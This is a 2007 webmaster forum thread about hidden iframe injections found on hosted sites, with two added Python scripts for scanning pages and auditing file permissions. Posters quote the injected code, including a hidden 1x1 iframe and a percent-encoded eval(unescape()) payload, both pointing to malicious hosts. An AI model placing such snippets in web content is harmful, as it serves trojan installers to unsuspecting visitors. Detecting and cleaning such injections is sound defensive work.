GoFuckYourself.com - Adult Webmaster Forum


Antonio 09-02-2007 04:38 AM

more than 100 of my sites infected with trojans - check yours
 
first of all a big thanks to KimJI for pointing it out to me


the sites are on two hosts, dreamhost and rocktflow, all my other hosts seem ok

anyway, if you have sites on these two hosts, you should check them - one line of iframe code in the index file, no idea what the code does




what a lovely way to spend your Sunday morning

Aussie Rebel 09-02-2007 04:54 AM

Can you please post the code so we know what we are looking for? thanks

Matt 26z 09-02-2007 05:04 AM

Are you running any scripts that may have a security hole?

BOSS1 09-02-2007 05:29 AM

Damn good that you noticed before you lost all bookmarkers!

Antonio 09-02-2007 05:30 AM

Quote:

Originally Posted by Aussie Rebel (Post 13022302)
Can you please post the code so we know what we are looking for? thanks


Code:

<iframe src='http://81.95.149.74/22/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

as I said no idea what it does and I don't want to know but I know for sure that I didn't put it there


Quote:

Originally Posted by Matt 26z (Post 13022317)
Are you running any scripts that may have a security hole?


nope, at first I thought it was from the recent linkex security hole, but when I started checking my sites - ALL of them were infected (I have linkex on only 15 sites or so), some of them are wordpress blogs, some are single index html file, some are running tgp scripts, basically mixed bag of goodies

gooddomains 09-02-2007 05:49 AM

fucking spyware

ladida 09-02-2007 05:55 AM

It's a trojan installer. You're in for some mess.

facialfreak 09-02-2007 06:00 AM

Seems to be an epidemic with Dreamhost'ed sites ...

And it's too bad really ... Dreamhost leaves all files owned by apache by default, so your sites might as well have a flashing neon sign inviting cyber criminals ... :eek2

I feel your pain Antonio, but unfortunately it usually takes something of this nature for webmasters to take a crash course in simple website security.

Scootermuze 09-02-2007 08:41 AM

I had that happen on a few sites of mine from a different server... I guess the perps just make their rounds from host to host..

I started checking them daily and removing the script as they popped up.. eventually went away...

Quickdraw 09-02-2007 08:47 AM

Here is another hack that has hit Dreamhost for sites like dommephonesex.com, thecollegeslut.com, beckybank.com, fortheloveoffeet.com, bbwbecky.com and haven't been fixed for months..

Code:

>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%73%74%61%74%31%63%6f%75%6e%74%2e%6e%65%74%2f%73%74%72%6f%6e%67%2f%31%36%37%2f%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));
which turns to this
iframe src=http://stat1count.net/strong/167

and they also have iframe as well

 src='hxxp://mediacount.net/adv/013/new.php' width=1 height=1>
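
A way to check files for both injection styles quoted in this thread, the plain hidden 1x1 iframe and the `eval(unescape(...))` wrapper around one. This is an added example, not code from any poster; the function names and the sample page are constructed here, and the hosts in the sample are placeholders.

```python
import re
from pathlib import Path
from urllib.parse import unquote

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
EVAL_RE = re.compile(r"eval\(\s*unescape\(\s*['\"]([^'\"]+)['\"]\s*\)\s*\)", re.I)
TINY_RE = re.compile(r"\b(?:width|height)\s*=\s*['\"]?[01](?:px)?['\"]?(?=[\s>/])", re.I)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
SRC_RE = re.compile(r"\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)

def _enc(text):  # percent-encode every byte, the obfuscation style seen in the thread
    return "".join("%%%02x" % b for b in text.encode())

# Constructed sample page; hosts are placeholders, not the ones posted in the thread.
SAMPLE = ("<iframe src='http://192.0.2.10/a/' width='1' height='1' style='visibility: hidden;'></iframe>"
          "<script>eval(unescape('" + _enc("document.write('<iframe src=http://bad.example/b/ "
          "width=1 height=1></iframe>');") + "'));</script>"
          "<iframe src='/player.html' width='640' height='360'></iframe>")

def hidden_iframes(html):
    """Return src values of iframes that are 0/1 pixel in size or styled invisible."""
    hits = []
    for tag in IFRAME_RE.findall(html):
        if TINY_RE.search(tag) or HIDDEN_RE.search(tag):
            m = SRC_RE.search(tag)
            hits.append(m.group(1) if m else "(no src)")
    return hits

def scan_text(html):
    """Findings for one file: plain hidden iframes, then eval(unescape()) payloads."""
    findings = [("hidden-iframe", s) for s in hidden_iframes(html)]
    for m in EVAL_RE.finditer(html):
        decoded = unquote(m.group(1))  # decode only, never execute
        inner = hidden_iframes(decoded)
        findings += [("obfuscated-iframe", s) for s in inner] or [("eval-unescape", decoded[:60])]
    return findings

def scan_tree(docroot, suffixes=(".html", ".htm", ".php", ".js")):
    """Map each suspicious file under docroot to its findings."""
    report = {}
    for path in Path(docroot).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = scan_text(path.read_text(errors="replace"))
            if found:
                report[str(path)] = found
    return report

if __name__ == "__main__":
    print(scan_text(SAMPLE))
```

A normally sized iframe, such as the 640x360 player in the sample, is not reported; run `scan_tree` against each document root on a schedule, since several posters saw the code return after removal.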


ridikuloz 09-02-2007 08:52 AM

happened to me before.... fuckin' russians :X

TeenCat 09-02-2007 09:39 AM

umm ... i think i am on the internet :) thanks for sharing that info! :thumbsup

Mutt 09-02-2007 11:39 AM

i had that one months ago - removed it and it never came back. i did have a WordPress installation on the server and that's the only guess I have for how they got in.

GrouchyAdmin 09-02-2007 11:48 AM

This is the problem you have when you run a virtualhost without SuExec/SuPHP permissions to set them to the specific user account, and directories are not properly chowned.

There's a performance hit for it, but it's well worth the cost of administration and notifying your clients. One old WP 1.5 install doesn't destroy hundreds of sites.
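
The ownership and permission condition raised by facialfreak and GrouchyAdmin can be checked directly on a shared host. This is an added example, not code from any poster: it lists entries under a document root that are owned by the web server account (or by anyone other than the site user) or are group- or world-writable. `audit_docroot`, `site_uid` and `web_uids` are names assumed for this sketch.

```python
import os
import stat
import sys


def audit_docroot(docroot, site_uid, web_uids=frozenset()):
    """Return {path: [reasons]} for entries another account's code could modify."""
    report = {}
    for root, _dirs, files in os.walk(docroot):
        # Check every directory (as `root`) and every file inside it.
        for path in [root] + [os.path.join(root, f) for f in files]:
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # a symlink's own mode is meaningless; audit its target in place
            reasons = []
            if st.st_uid in web_uids:
                reasons.append("owned by web server account")
            elif st.st_uid != site_uid:
                reasons.append("owned by uid %d, not the site user" % st.st_uid)
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if st.st_mode & stat.S_IWGRP:
                reasons.append("group-writable")
            if reasons:
                report[path] = reasons
    return report


if __name__ == "__main__":
    # Usage: python audit.py /path/to/docroot   (audits as the current user)
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, why in sorted(audit_docroot(target, os.getuid()).items()):
        print(path, "; ".join(why))
```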

Pornopat 09-02-2007 11:50 AM

Had that one and it gave me a fucking headache for months. It just kept coming back in different forms.

d-null 10-04-2007 02:26 AM

bumping this because I just noticed that I have been hit on two different hosts

my own site triggered my norton virus detection and I checked and it is the same code but mine was directing to mediacount.net

bastards

d-null 10-04-2007 02:38 AM

I notice that mediacount.net is a russian site as well.:321GFY

Check your index.html files... they only got into my main domains (not the subdomains)

cess 10-04-2007 05:01 AM

Quote:

Originally Posted by facialfreak (Post 13022392)
Seems to be an epidemic with Dreamhost'ed sites ...

And it's too bad really ... Dreamhost leaves all files owned by apache by default, so your sites might as well have a flashing neon sign inviting cyber criminals ... :eek2

Eh?? I have two accounts with dreamhost and every domain I've ever added always had extra web security "enabled". Every file on my dreamhost accounts is owned by my user name and not apache.

cess 10-04-2007 05:12 AM

Quote:

Originally Posted by GrouchyAdmin (Post 13023218)
This is the problem you have when you run a virtualhost without SuExec/SuPHP permissions to set them to the specific user account


By default dreamhost does enable that.

d-null 10-04-2007 11:18 AM

mine was not dreamhost and I found the problem on two completely separate distinct servers, so it is a good idea to check your files periodically no matter who you are hosting with

Az A Bay Bay 10-04-2007 12:52 PM

congrats!

riddler 10-04-2007 12:56 PM

rocketflow servers seem to get rooted a lot.

alby_persignup 10-04-2007 01:26 PM

another trojan attacks!

